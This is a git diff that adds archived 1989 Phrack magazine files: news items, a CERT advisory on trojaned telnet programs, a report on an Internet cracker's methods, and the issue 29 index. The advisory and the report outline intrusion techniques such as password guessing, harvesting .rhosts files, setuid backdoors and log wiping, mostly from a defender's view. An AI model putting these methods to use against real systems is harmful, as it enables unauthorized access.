+environment."
+
+Fuchs, Vice President for Computing and Information Technology at
+Princeton University, sees the move as a strengthening factor:
+"The need for campus networks and the introduction of new
+technology make it necessary to build a common base of network
+services using the most progressive technology available.  By
+eliminating overlap between our two organizations, we will
+become more efficient, and more importantly, we can take a
+stronger role in the the formation of the national education and
+research network.  We can achieve this goal faster and at lower
+cost by leveraging the efforts of the two major academic
+networking organizations."
+
+The merger of CSNET and BITNET has been studied for more than a
+year by a planning group consisting of representatives from both
+networks.  CSNET currently lists 145 institutional and corporate
+members, and BITNET 480 members.  Together, the two networks
+cover all 50 states and 32 foreign countries, including Japan,
+Brazil, Mexico, and Argentina.  Both maintain gateways to EARN
+(European Academic Research Network), NetNorth (Canada), and the
+National Internet.
+
+The planning group's recommendations to merge were approved by
+the BITNET, Inc.  Trustees and the Directors of the University
+Corporation for Atmospheric Research, operators of CSNET for the
+last five years.  An information packet on the merger is being
+mailed to all members of both networks this week, with a ballot
+for BITNET members, who must approve the final legal steps under
+the provisions of BITNET By-Laws.  In an advisory vote last
+winter, BITNET members approved the merger in principle by more
+than 90% of those voting.
+
+A gradual transition period is planned to bring together CSNET
+and BITNET services.  CREN plans to continue use of EDUCOM and
+Bolt, Beranek and Newman (BBN) to provide technical and general
+management services to its members.
+
+EDUCOM President Kenneth M. King commented, "We are entering a
+particularly challenging period in the creation of an advanced
+national network infrastructure for research and education.  CREN
+will play a major role in the future of these computer networks,
+which are becoming more and more important to the conduct of
+research and the quality of education.  EDUCOM is pleased to have
+an opportunity to support the services and activities of CREN. "
+
+Frank Heart, Senior Vice President, BBN Systems and Technologies
+Corporation, said, "In keeping with its long involvement in the
+development of networking technologies, BBN is pleased to play a
+major supporting role in the evolution of BITNET and CSNET."
+
+The proposed CREN Board includes Fuchs and Galler;
+
+Douglas Bigelow. . . . . Wesleyan University
+William Curtis . . . . . University Corporation for Atmospheric Research
+David Farber . . . . . . University of Pennsylvania
+Suzanne Johnson. . . . . INTEL Corporation
+Mark Laubach . . . . . . Hewlett-Packard Corporation
+Philip Long. . . . . . . Yale University
+Dennis Ritchie . . . . . AT&T Bell Laboratories
+Martin Solomon . . . . . University of South Carolina
+Douglas Van Houweling. . University of Michigan
+William Yundt. . . . . . Stanford University
+
+For more information, contact
+
+              Corporation for Research and Educational Networking
+                                   Suite 600
+                              1112 16th Street NW
+                             Washington, DC  20036
+
+                                (202) 872-4215
+
+              [Obviously they decided not to call it ONEnet --KL]
+_______________________________________________________________________________
+
+CERT Internet Security Advisory                                 August 16, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From Kenneth R. van Wyk
+
+Many computers connected to the Internet have recently
+experienced unauthorized system activity.  Investigation shows
+that the activity has occurred for several months and is
+spreading.  Several UNIX computers have had their "telnet"
+programs illicitly replaced with versions of "telnet" which log
+outgoing login sessions (including usernames and passwords to
+remote systems).  It appears that access has been gained to many
+of the machines which have appeared in some of these session
+logs.  (As a first step, frequent telnet users should change
+their passwords immediately.)  While there is no cause for panic,
+there are a number of things that system administrators can do to
+detect whether the security on their machines has been
+compromised using this approach and to tighten security on their
+systems where necessary.  At a minimum, all UNIX site
+administrators should do the following:
+
+o Test telnet for unauthorized changes by using the UNIX
+  "strings" command to search for path/filenames of possible log
+  files.  Affected sites have noticed that their telnet programs
+  were logging information in user accounts under directory names
+  such as "..." and ".mail".
+
+In general, we suggest that site administrators be attentive to
+configuration management issues.  These include the following:
+
+
+o Test authenticity of critical programs - Any program with
+  access to the network (e.g., the TCP/IP suite) or with access
+  to usernames and passwords should be periodically tested for
+  unauthorized changes.  Such a test can be done by comparing
+  checksums of on-line copies of these programs to checksums of
+  original copies.  (Checksums can be calculated with the UNIX
+  "sum" command.)  Alternatively, these programs can be
+  periodically reloaded from original tapes.
+
+o Privileged programs - Programs that grant privileges to users
+  (e.g., setuid root programs/shells in UNIX) can be exploited to
+  gain unrestricted access to systems.  System administrators
+  should watch for such programs being placed in places such as
+  /tmp and /usr/tmp (on UNIX systems).  A common malicious
+  practice is to place a setuid shell (sh or csh) in the /tmp
+  directory, thus creating a "back door" whereby any user can
+  gain privileged system access.
+
+o Monitor system logs - System access logs should be periodically
+  scanned (e.g., via UNIX "last" command) for suspicious or
+  unlikely system activity.
+
+o Terminal servers - Terminal servers with unrestricted network
+  access (that is, terminal servers which allow users to connect
+  to and from any system on the Internet) are frequently used to
+  camouflage network connections, making it difficult to track
+  unauthorized activity.  Most popular terminal servers can be
+  configured to restrict network access to and from local hosts.
+
+o Passwords - Guest accounts and accounts with trivial passwords
+  (e.g., username=password, password=none) are common targets.
+  System administrators should make sure that all accounts are
+  password protected and encourage users to use acceptable
+  passwords as well as to change their passwords periodically, as
+  a general practice.  For more information on passwords, see
+  Federal Information Processing Standard Publication (FIPS PUB)
+  112, available from the National Technical Information Service,
+  U.S. Department of Commerce, Springfield, VA 22161.
+
+o Anonymous file transfer - Unrestricted file transfer access to
+  a system can be exploited to obtain sensitive files such as the
+  UNIX /etc/passwd file.  If used, TFTP (Trivial File Transfer
+  Protocol - which requires no username/password authentication)
+  should always be configured to run as a non-privileged user and
+  "chroot" to a file structure where the remote user cannot
+  transfer the system /etc/passwd file.  Anonymous FTP, too,
+  should not allow the remote user to access this file, or any
+  other critical system file.  Configuring these facilities to
+  "chroot" limits file access to a localized directory structure.
+
+o Apply fixes - Many of the old "holes" in UNIX have been closed.
+  Check with your vendor and install all of the latest fixes.
+
+If system administrators do discover any unauthorized system
+activity, they are urged to contact the Computer Emergency
+Response Team (CERT).
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+- - - - - - -
+
+Internet Cracker On The Loose:  Who Is He?
+October 2, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ There
+is a cracker on the loose in the Internet.  This is the
+information made public so far.  Traces of the cracker were found
+at the Institute for Advanced Studies in Princeton.  He also left
+traces at one of the Super computer centers.  Both CERT and the
+FBI have been called.
+
+The technique that is being used is as follows:
+
+1) He has a modified telnet that tries a list passwords on
+   accounts.  Username forwards and backwards, username + pw,
+   etc.
+
+2) He seems to have a program call "ret", that is breaking into
+root.
+
+3) He seems to be getting a list of victim machines via people's
+.rhosts files.
+
+4) He copies password files to the machines that he is currently
+working from.
+
+5) He is good about cleaning up after himself.  He zeros out log
+   files and other traces of himself.
+
+6) The breakins are occurring between 10 PM Sunday nights and 8
+   AM Monday mornings.
+
+7) He seems to bring along a text file of security holes to the
+   machines he breaks into.
+
+8) Backtracing the network connections seem to point to the
+   Boston area as a base of operations.
+
+The system administrator at IAS found a directory with the name
+"..  " (dot dot space space).  The files mentioned above were
+found in this directory.
+_______________________________________________________________________________
+
+Worried Firms Pay Hush Money To "Hackers"                         June 12, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Richard Caseby (London Times)
+
+            "Are London Firms Offering Amnesty To Hacker Thieves?"
+
+Firms in the City of London are buying the silence of hackers who
+break into their computers and steal millions of pounds.
+
+At least six London firms have signed agreements with criminals,
+offering them amnesty if they return part of the money.  The
+firms fear that if they prosecute they will lose business when
+customers learn that their computer security is flawed.
+
+In several of the case the losses exceeded 1 million pounds, but
+only a tenth of the total was returned.
+
+The Computer Industry Research Unit (CIRU) which uncovered the deals and which
+is advising the Department of Trade and Industry in data security, believes the
+practice of offering amnesties is widespread.
+
+"Companies who feel vulnerable are running scared by agreeing to these immoral
+deals.  Their selfishness is storing up serious problems for everyone else,"
+said Peter Nancarrow, a senior consultant.
+
+Police have warned that deals struck with criminals could
+possibly lead to an employer being prosecuted for perverting the
+course of justice.
+
+Detective Inspector John Austin, of Scotland Yard's computer
+fraud squad, said, "Employers could find themselves in very deep
+water by such strenuous efforts to protect the credibility of
+their image."
+
+Legal experts say the firms are making use of section five of the
+Criminal Law Act 1967 which allows them to keep silent on crimes
+and privately agree on compensation.  However, an employer
+becomes a witness to the offense by taking evidence from a
+criminal when the deal is drawn up.
+
+Hackers steal by electronically transferring funds or by
+programming a computer to round off all transactions by a tiny
+amount and diverting the money to a separate account.
+
+In one case, an assistant programmer at a merchant bank diverted
+8 million pounds to a Swiss bank account and then gave back 7
+million in return for a non-disclosure agreement protecting him
+against prosecution.
+
+Such thefts have spread alarm throughout London, with consultants
+offering to penetrate the computer networks of banks and finance
+houses to pinpoint loopholes before a hacker does.
+
+The biggest contracts cost up to 50,000 pounds and can involve a
+four month investigation in which every weakness is explored.
+
+Detectives have found that computer security at many London
+institutions is riddled with loopholes.  A city of London police
+operation, codenamed Comcheck, revealed wide spread weaknesses.
+Firms were asked to track the number of unauthorized logons over
+Easter bank holiday.
+
+Some companies unable to tell whether hackers had penetrated
+their network, while others lacked any security defenses.
+
+In addition to theft, companies are vulnerable to blackmail.
+Hackers can threaten to sabotage computers by inserting "viruses"
+and "logic bombs" --rogue programs which can paralyze a system.
+
+This type of threat has prompted the offer of a new insurance
+policy underwritten by Lloyd's which specifically covers viruses
+and other computer catastrophes.
+______________________________________________________________________
diff --git a/phrack29/1.txt b/phrack29/1.txt
new file mode 100644
index 0000000..3291220
--- /dev/null
+++ b/phrack29/1.txt
@@ -0,0 +1,66 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 29, File #1 of 12
+
+                    Phrack Inc. Newsletter Issue XXIX Index
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                               November 17, 1989
+
+
+     Greetings and welcome to Issue 29 of Phrack Inc.  For those of you who
+have been with us from the beginning, the date on this issue may hold some
+historical significance:
+
+                     Happy Fourth Anniversary Phrack Inc.!
+
+     This issue we feature two files dealing with electronic fund transfer
+written by a member of the Legion of Doom who wishes to remain anonymous.
+The second article tells a story detailing how an actual electronic fund
+transfer might take place -- Is it true or is it fiction?  We decided to let
+you, the reader, decide that for yourself.
+
+     The Future Transcendent Saga continues as usual in this issue with part
+two of "Introduction to the Internet Protocols."  We also present to you the
+second edition of Network Miscellany which focuses largely on Public Access
+Unix systems around the country.  Last, but not least, concerning the wide area
+networks, we have Covert Paths -- a file about hacking on the Internet and how
+to make sure you cannot be tracked down.
+
+     On a lighter note, it appears that Teleconnect Magazine liked The Mentor's
+"Hacker's Manifesto" so much that they decided to print a portion of it in
+their November 1989 issue.  If you receive this magazine you will find it on
+page 55, but only the last 4 paragraphs (they apparently did not like the
+beginning of the file).  The interesting thing is that Teleconnect claims that
+they were given the article by MCI Security who recently discovered it on a
+bulletin board.  If you are a long time reader of Phrack Inc., you might
+remember that this article was dated for January 8, 1986 and originally
+appeared in Phrack Inc. Newsletter Issue VII (file 3 of 10) and again in issue
+XXIV (file 3 of 9).
+
+     As always, we ask that anyone with network access drop us a line to either
+our Bitnet or Internet addresses...
+
+               Taran King                        Knight Lightning
+          C488869@UMCVMB.BITNET                C483307@UMCVMB.BITNET
+       C488869@UMCVMB.MISSOURI.EDU          C483307@UMCVMB.MISSOURI.EDU
+
+And we can also be reached via our new mail forwarding addresses (for those
+that cannot mail to our Bitnet or Internet addresses):
+
+               ...!netsys!phrack      or      phrack@netsys.COM
+_______________________________________________________________________________
+
+Table of Contents:
+
+1.  Phrack Inc. XXIX Index by Taran King and Knight Lightning
+2.  Phrack Pro-Phile XXIX on Emmanuel Goldstein
+3.  Introduction to the Internet Protocols II:  Chapter Nine of the FTS by KL
+4.  Network Miscellany II by Taran King
+5.  Covert Paths by Cyber Neuron Limited and Synthecide
+6.  Bank Information compiled by Legion of Doom!
+7.  How We Got Rich Through Electronic Fund Transfer by Legion of Doom!
+8.  The Myth and Reality About Eavesdropping by Phone Phanatic
+9.  Blocking of Long-Distance Calls... Revisited by Jim Schmickley
+10-12 Phrack World News XXIX/Parts 1-3 by Knight Lightning
+_______________________________________________________________________________
+                        >--------=====END=====--------<
diff --git a/phrack29/10.txt b/phrack29/10.txt
new file mode 100644
index 0000000..2ca8776
--- /dev/null
+++ b/phrack29/10.txt
@@ -0,0 +1,492 @@
+                                ==Phrack Inc.==
+
+                    Volume Three, Issue 29, File #10 of 12
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN                Issue XXIX/Part 1                PWN
+            PWN                                                 PWN
+            PWN                November 17, 1989                PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+                  Welcome to Issue XXIX of Phrack World News!
+
+Although Phrack Inc. is officially four years old, Phrack World News is not.
+PWN originally in its first issue (which was in Phrack Inc. II... its a long
+story) was known as "Phreak World News," but quickly changed and starting with
+Phrack Inc. Issue III became Phrack World News as you see it today.
+
+This issue of Phrack World News contains stories and articles detailing events
+and other information concerning AT&T, Clifford Stoll, Kent O'Brien, Kevin
+David Mitnick, Datacrime, DEC, FAX, FCC, Galactic Hackers Party, IBM, Lawrence
+Livermore National Laboratory, Leonard Mitchell DiCicco, MCI, NASA, Robert
+Morris, Shockwave Rider, SummerCon '89, The "NEW" TAP Magazine, 2600 Magazine,
+Viruses, Worms Against Nuclear Killers, and much more so keep reading and
+enjoy.
+
+:Knight Lightning
+
+        "The Real Future Is Behind You... And It's Only The Beginning!"
+_______________________________________________________________________________
+
+Judge Proposes Community Service For Hacker's Accomplice       October 13, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Kathy McDonald (New York Times)
+
+LOS ANGELES -- A federal judge says she is inclined to sentence a man who
+pleaded guilty to helping computer hacker Kevin Mitnick steal a computer
+security program to community service and asked him to submit a proposal on
+such a sentence.
+
+U.S. District Judge Mariana R. Pfaelzer said Leonard Mitchell DiCicco, of
+unincorporated suburban Calabasas, had been helpful in the case, in which he
+reported Mitnick to officers at Digital Equipment Corporation in Massachusetts.
+
+Mitnick has admitted he stole a DEC computer security program and
+electronically brought it to California.
+
+Pfaelzer gave DiCicco, age 23, until November 1 to come up with a detailed
+proposal for his community service.
+
+"I favor the handicapped, older people, something which is out in the
+community," Pfaelzer said.
+
+DiCicco pleaded guilty in July to one count of aiding and abetting the
+interstate transportation of stolen property.  He admitted that in 1987 he let
+Mitnick, age 25, of suburban Panorama City, use his office computer at
+Voluntary Plan Administrators in Calabasas to break into the DEC system.
+
+Mitnick pleaded guilty and was sentenced in July to one year in prison and six
+months in a community treatment program aimed at breaking his "addiction" to
+computer hacking.
+
+Under a plea agreement with the government, DiCicco pleaded guilty in exchange
+for a promise that he would not be prosecuted for any of the other instances of
+computer hacking he and Mitnick carried out.
+
+He said after Thursday's (October 12) court appearance that he would like to
+put his computer talents to use to help others.
+
+Assistant U.S. Attorney James Asperger did not object to giving DiCicco
+community service rather than a prison term, saying:  "I think Mr. DiCicco's
+cooperation in this case was essential to the prosecution of both Mr. Mitnick
+and himself.  He is certainly lower in culpability than Mr. Mitnick."
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+If you are looking for other articles related to Leonard Mitchell DiCicco and
+the famous Kevin David Mitnick please refer to;
+
+"Pacific Bell Means Business"                      (10/06/88) PWN XXI....Part 1
+"Dangerous Hacker Is Captured"                     (No Date ) PWN XXII...Part 1
+"Ex-Computer Whiz Kid Held On New Fraud Counts"    (12/16/88) PWN XXII...Part 1
+"Dangerous Keyboard Artist"                        (12/20/88) PWN XXII...Part 1
+"Armed With A Keyboard And Considered Dangerous"   (12/28/88) PWN XXIII..Part 1
+"Dark Side Hacker Seen As Electronic Terrorist"    (01/08/89) PWN XXIII..Part 1
+"Mitnick Plea Bargains"                            (03/16/89) PWN XXV....Part 1
+"Mitnick Plea Bargain Rejected As Too Lenient"     (04/25/89) PWN XXVII..Part 1
+"Computer Hacker Working On Another Plea Bargain"  (05/06/89) PWN XXVII..Part 1
+"Mitnick Update"                                   (05/10/89) PWN XXVII..Part 1
+"Kenneth Siani Speaks Out About Kevin Mitnick"     (05/23/89) PWN XXVII..Part 1
+"Judge Suggests Computer Hacker Undergo Counseling"(07/17/89) PWN XXVIII.Part 1
+"Authorities Backed Away From Original Allegations"(07/23/89) PWN XXVIII.Part 1
+_______________________________________________________________________________
+
+How Hacker Jammed 911 Police Lines                              October 4, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Benny Evangelista
+
+He is a brilliant, but lonely teenage computer hacker with too much time on his
+hands.
+
+And the police said the 16-year-old San Gabriel boy used that time to put a
+sophisticated high-tech spin on age-old teenage telephone pranks by tying up
+police emergency lines from Hayward, California to Cedar Rapids, Iowa, and
+harassing other people, all from what he thought was the safety of his home
+Commodore 64 computer.
+
+The calls that jammed Hayward police and Alameda County sheriff's lines were
+potentially dangerous, but officials said that no emergency was neglected
+because of them.
+
+This is the way he got his kicks, but he had most of us just absolutely
+crazed," said Connie Bullock, security director for one of the long-distance
+companies that suffered thousands of dollars of losses.
+
+The boy, who police would not identify because of his age, is <was> scheduled
+to be arraigned October 16th in Los Angeles County Juvenile Court for making
+telephone bomb threats, fraudulently obtaining long-distance telephone service,
+interfering with a police officer and making harassing phone calls.
+
+"Our goal is to get him on probation so we can doctor him for the next couple
+of years," said Sgt. Bernie Kammer, of the Los Angeles County sheriff's
+computer crime detail.
+
+"Hopefully, he may be one of the guys who sends the next space capsule up,"
+Kammer said.
+
+The hacker, who has used handles like "Kent O'Brien," surfaced sometime last
+October, said Bullock, director of network security for ComSystems
+Incorporated, a Van Nuys-based long distance company.
+
+Bullock learned that someone had tapped into the electronic phone mail system
+of a Cedar Rapids-based long-distance company using ComSystems lines.
+
+A security officer for the Iowa company began receiving harassing and
+threatening calls, some at home in the middle of the night, she said.
+
+The hacker became good at cracking home answering-machine codes in the Southern
+California area and possibly elsewhere, and changed several outgoing messages,
+she said.
+
+He also broke into the phone mail system at Sears administrative office in
+Hayward, California and called workers there, she said.  He even commandeered
+one phone mail box and had other people leave messages.
+
+He would also make anonymous calls or just let the phone ring in the middle of
+the night and hang up.  He phoned in bomb threats to his old high school and a
+fast-food restaurant, Kammer said.
+
+In all cases, he used a computer synthesizer to disguise his voice, Kammer
+said.  And he routed the calls in ways to make tracing impossible.
+
+Then he started calling Cedar Rapids police emergency 911 lines, bombarding
+dispatchers in the middle of the night with a series of computer-assisted calls
+that would tie up the lines for hours.  He would make small talk and ask about
+the weather, said Cedar Rapids Detective Stan McCurg.
+
+The boy could call up five or six other people, hold their lines captive and
+route the calls to police, McCurg said.
+
+"The scary thing is he had the capability to screw you over and you couldn't do
+anything about it," McCurg said.
+
+Police say the boy pulled the same trick on the Alameda County Sheriff's
+office, San Francisco police and the Los Angeles County sheriff's office in
+Crescrenta Valley.
+
+The calls did not cause any safety problems, but there was always that
+potential, Kammer said.
+
+The big break came after the boy started calling Hayward police dispatchers in
+late February.  At first, the dispatchers played along, trying to find out who
+and where the boy was while the boy gave false clues to throw them off.
+
+"It was like, 'Catch me if you can,'" said Hayward Detective Dennis Kutsuris.
+
+On March 2, dispatchers kept him talking from 8:10 a.m. to 1:20 p.m., long
+enough to trace the call to his San Gabriel home.  That night, police served a
+search warrant and found the boy in bed talking on the phone using his
+synthesizer.
+
+The hacker was a lonely boy who dropped out of high school because it didn't
+challenge him, but had passed his general education equivalency exam and was
+taking courses from a community college, according to Kammer and Bullock.
+
+Police seized the computer equipment, but formal charges were not filed until
+last month because of the complex followup investigation, Kammer said.
+
+Bullock said her company lost about $71,000 worth of calls, plus four angered
+customers.  Kammer said although police believe the loss could be "hundreds of
+thousands" of dollars, they can only prove the loss of $2000 in court.
+
+In the meantime, Hayward police received another call September 6th from a
+computer-synthesized voice that they feel came from the boy.  Kammer said a
+relative had given the boy another computer, but they have no proof that he was
+back to his old tricks.
+
+Still, that incident, along with Cedar Rapids police reports will be used for a
+probation report, Kammer said.
+
+Bullock said the case was intriguing at first, but became frustrating as her
+file grew to 2 feet thick.
+
+"He had me by the guts," she said.  "I was obsessed with finding him.  He's a
+typical 16-year old, but a little more menacing.  He is pretty smart, but he
+had absolutely nothing to do, but sit in his room with his computer equipment
+and all he had to do was talk on the phone."
+_______________________________________________________________________________
+
+Just The FAX, Please                                           November 6, 1989
+~~~~~~~~~~~~~~~~~~~~
+by Noam Cohen (New York Times)
+
+Teachers in rural Minnesota are ready to hear the most up-to-date version of
+the oldest excuse in the book:  "Honest, teach, the fax ate my homework."
+
+Yes, the facsimile machine has gone to school in Sibley County, an agricultural
+area 60 miles southwest of Minneapolis-St. Paul.
+
+It is the last component to be installed in a four-year-old interactive
+television system, or ITV, that brings advanced classroom instruction to small,
+isolated areas through closed-circuit cable television.
+
+In an education system where students adjust the contrast knobs to get a better
+look at their calculus teacher, it is hardly surprising that these students are
+the first in the country to use the fax to receive or hand in homework.
+
+David Czech, the telecommunications director for the school district who is
+responsible for its cable system education program, said that now, televised
+teachers can even give surprise quizzes.
+
+"The fax makes the classroom truly self-contained," said Kelly Smith, an
+assistant principal at Gibbon-Fairfax-Winthrop High School, in Sibley County,
+who taught mathematics for the ITV program before fax machines were introduced.
+He said that when he taught he "had to rely on transportation in the district
+and assignments always stacked up."
+
+The fax machines, part of a special line made by Ricoh Corporation, transmit on
+the same wiring that carries the television image to students.  By using cable
+instead of telephones, the district saves money on telephone costs and receives
+quicker, cleaner copies.
+
+The machines have a built-in copier, allowing one student to retrieve the
+assignment and hand copies to classmates (usually no more than eight).
+Students then use the machine to hand back work.
+
+The Sibley County school district purchased and installed the fax machines with
+the remaining $22,000 of a $150,000 state grant for ITV, according to Czech.
+
+The machines, which school officials and a Ricoh spokeswoman say are the first
+to be used in high school education, have generated interest elsewhere.  Czech
+says he has received calls from education officials in Hawaii, Wisconsin, Ohio
+and other parts of Minnesota.
+_______________________________________________________________________________
+
+MCI Sues AT&T -- Charges Deceptive Advertising                 October 12, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+       "We Welcome The Opportunity To Discuss Who Is Misleading Whom..."
+
+AT&T is using false and malicious advertising to protect its long-distance
+business, MCI Communications Corporation charges in a lawsuit filed Tuesday,
+October 10.
+
+MCI, whose 10 percent market share makes it a distant number two to AT&T's 75
+percent, says its giant rival is resorting to false claims in the hope of
+stemming the loss of 100,000 customers to MCI each week.
+
+AT&T, however, says it will defend itself with a countersuit.  According to
+AT&T spokesman Herb Linnen:  "We welcome the opportunity to discuss who is
+misleading whom... we have been quite concerned for some time now about MCI's
+misleading print and broadcast advertising.  We have taken our complaints
+directly to MCI without success."
+
+He added, "AT&T stands behind its advertising."
+
+This latest litigation is simply the latest chapter in MCI's long and very
+bitter battle with AT&T, which began in the 1970's when MCI successfully broke
+AT&T's long-distance monopoly by offering "Execunet," the first long-distance
+service bypassing AT&T offered to the public.  The two companies have battled
+each other at the Federal Communications Commission, which authorizes the rates
+for each, ever since.  This is the first time since AT&T's divestiture that the
+arguments have been taken into a courtroom.
+
+In an interview, MCI Chairman William McGowan said that "AT&T ads are sleazy,"
+and he noted that the nine month old campaign grew increasingly negative,
+forcing MCI into the courts.
+
+AT&T responded saying that MCI is resorting to the courts since "...they just
+can't hack it in the marketplace..."
+
+McGowan responded that he believes a lawsuit is the only way to fight a company
+which is spending two million dollars a day on advertising.  He said, "Our
+budget is big -- $51 million -- but how do you compete with someone who is nine
+or ten times your size in advertising?"
+
+MCI is still studying the impact of the latest round of AT&T ads, but McGowan
+said he is sure MCI should have gained "a lot more" than 100,000 customers per
+week if not for the advertising.  The advertising has not affected professional
+telecommunications managers, but does have an impact on individual and small
+business customers, he said.
+
+The MCI suit, filed in U.S. District Court in Washington, DC, alleges that
+AT&T's advertising campaign "maliciously attacked MCI's honesty and the value
+of MCI's products and service by falsely and deceptively representing that it
+is superior to its competitors in general, and MCI in particular, in terms of
+trustworthiness, quality and price.
+
+MCI's suit cites AT&T ads that assert MCI's rates are cheaper than AT&T's only
+when calls are made over 900 miles away and after 7 p.m. MCI's suit also takes
+umbrage at AT&T's advertisement which states that MCI customers "might have
+better luck calling Mars than trying to reach MCI representatives for an
+explanation of their bills."
+
+The ads, the suit charges, also claim non-AT&T companies provide slow telephone
+connections; that other companies do not operate worldwide like AT&T; and that
+competing 800, facsimile and WATS services are inferior.
+
+The suit says AT&T "has wrongfully profited and MCI has been damaged by being
+wrongfully thwarted from maximizing its sales potential."
+
+The suit asks the court to order AT&T to discontinue advertising its services
+for a period of one year and that advertisements after that time be approved by
+the court and carry a notice to that effect in the advertisement itself.
+Additionally, it asks for profits "wrongfully amassed" by AT&T on the sale of
+its products and services during the past year, plus interest and legal fees.
+
+McGowan was particularly irked by a claim that MCI's fax service has 57 percent
+more problems than AT&T faxes.  He said that number was arrived at by figuring
+the difference between AT&T service -- with 4.9 percent errors -- and MCI, with
+7.7 percent errors.  Rather than reporting the 2.8 percent difference, the ad
+claims a 57 percent higher rate -- the percentage increase between 4.9 percent
+and 7.7 percent.
+
+"Talk about misleading," McGowan said.
+
+"Yes, talk about misleading," said Herb Linnen.  "They've survived this long in
+part based on the deceptions they've used on a public not well educated on the
+technical aspects of telephony... we'll clear this up once and for all in court
+with a countersuit."
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Unleashing Ma Bell                                             October 24, 1989
+~~~~~~~~~~~~~~~~~~
+by Peter Passell (New York Times)
+
+                  Could AT&T's rivals in long-distance phone
+                 service survive no-holds-barred competition?
+
+Since the breakup of the telephone monopoly in 1984, the Federal Communications
+Commission has kept AT&T on a short leash to prevent the giant company from
+chewing up the "small fry."
+
+But now two of those small fry have grown into profitable multibillion-dollar
+corporations, and AT&T is asking the regulators for the freedom to fight for
+market share.  If the FCC agrees -- a crucial decision could come as early as
+Thursday -- high-volume telephone users are likely to reap a bonanza from lower
+prices.
+
+When the Bell System was dismembered, analysts generally agreed that rivals
+would need a lot of help from Washington to gain a secure foothold in the
+long-distance market dominated by the ultimate name-brand company.
+
+The analysts were right:  After AT&T's competitors lost their discounts on
+regulated charges for hookups to local telephone exchanges, all of them took a
+financial bath and some went broke.
+
+But in the ensuing consolidation, a few companies emerged with both the
+technical capacity to match AT&T's service and the marketing savvy to sell
+themselves to once-skeptical consumers.
+
+MCI Communications now has 12 percent of the long-distance market and in the
+last year has grown four times as fast as AT&T.
+
+US Sprint Communications, with its much-ballyhooed all-fiber-optic system, has
+an 8 percent share and is the principal carrier for 117 of America's 800
+largest companies.
+
+Joel Gross, a communications analyst at Donaldson, Lufkin & Jenrette, believes
+a fourth network, assembled from a half-dozen smaller companies, will soon
+emerge.
+
+One reason AT&T's rivals have managed to do so well in the last few years is
+continuing regulatory discrimination.
+
+Last summer, the FCC switched AT&T from traditional fair-rate-of-return
+regulation to a more flexible "price-cap" system that gives the company
+discretion to adjust individual rates within a narrow price band.
+
+But neither the old price regulations nor the new ones apply to MCI, US Sprint
+and other smaller long-distance companies.  And they have taken advantage of
+AT&T's inability to cut prices, offering volume discounts where AT&T is most
+vulnerable to customer defections.
+
+AT&T has fought back, convincing the FCC to allow it fast-track approval for
+rate concessions needed to hang onto its biggest customers.
+
+And it is now asking the commission for broad discretion to cut rates by more
+than the 5 percent permitted under the price-cap rule.  If the FCC agrees, it
+is a sure bet that AT&T will price aggressively, accepting sharp reductions in
+its fat profit margins to check its loss of market share.
+
+It is obvious why MCI and US Sprint are unhappy at the prospect of an AT&T
+unleashed. But it is not so easy to see how the public would lose from the
+ensuing donnybrook.
+
+One worry is that AT&T would slash prices by enough to drive rivals out of
+business, and then be free to price-gouge.
+
+But as Peter Pitsch, a former FCC staff member who now consults for AT&T points
+out, such "predatory" pricing is only a plausible option if the predator can
+hope to make up the inevitable short-term losses with long-term monopoly gains.
+And two considerations make such a calculation unlikely.
+
+Once the cables have been laid and the switches installed, it costs very little
+to operate a long-distance phone system.  Thus even if AT&T were able to drive
+MCI and US Sprint into bankruptcy, their creditors would find it advantageous
+to continue to sell long-distance services.
+
+And if AT&T somehow did manage to shut down its rivals, the FCC would hardly be
+likely to reward it with permission to charge monopoly prices.
+
+Another concern is that price-cutting would make long-distance service
+unprofitable for all, discouraging further investment.
+
+That, however, might not be such a bad thing.  Losses are capitalism's way of
+telling businesses to slow down:  There is enormous overcapacity in
+long-distance communications and more investment anytime soon is unlikely to be
+productive.
+
+Does all this mean the commission will hang tough and permit AT&T to flex its
+competitive muscles? A year ago, when the FCC was dominated by Reagan-appointed
+free marketers, the answer would have been easy.
+
+Today, with a Bush-appointed majority led by a chairman, Alfred Sikes, of less
+certain ideological bent, it is hard to say.
+
+MCI and US Sprint have managed to squeeze a lot of regulatory mileage out of
+their underdog status, and certainly will not give up the privileges that go
+along without a fight.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+AT&T Strikes Back:  Countersues MCI                            October 27, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+AT&T struck back on Thursday, October 27 at advertising claims made by MCI
+Communications Corporation and received two rulings from the Federal
+Communications Commission affecting regulation of its long distance services.
+
+AT&T said in a countersuit against MCI filed in Washington, DC that MCI was
+misleading consumers through false and deceptive advertising in its business
+and residential long distance service.  AT&T's filing denied similar
+allegations made by MCI in a suit filed October 10.
+
+Victor Pelson, AT&T group executive, said MCI unfairly compared its discount
+service with AT&T's regular long distance service rather than its discount
+service.  Pelson also denied claims that the quality of MCI voice service was
+superior to AT&T's, or that its facsimile service featured fewer garbled
+transmissions than AT&T's.
+
+"We intend to clarify any misconceptions in the market," said Merrill Tutton,
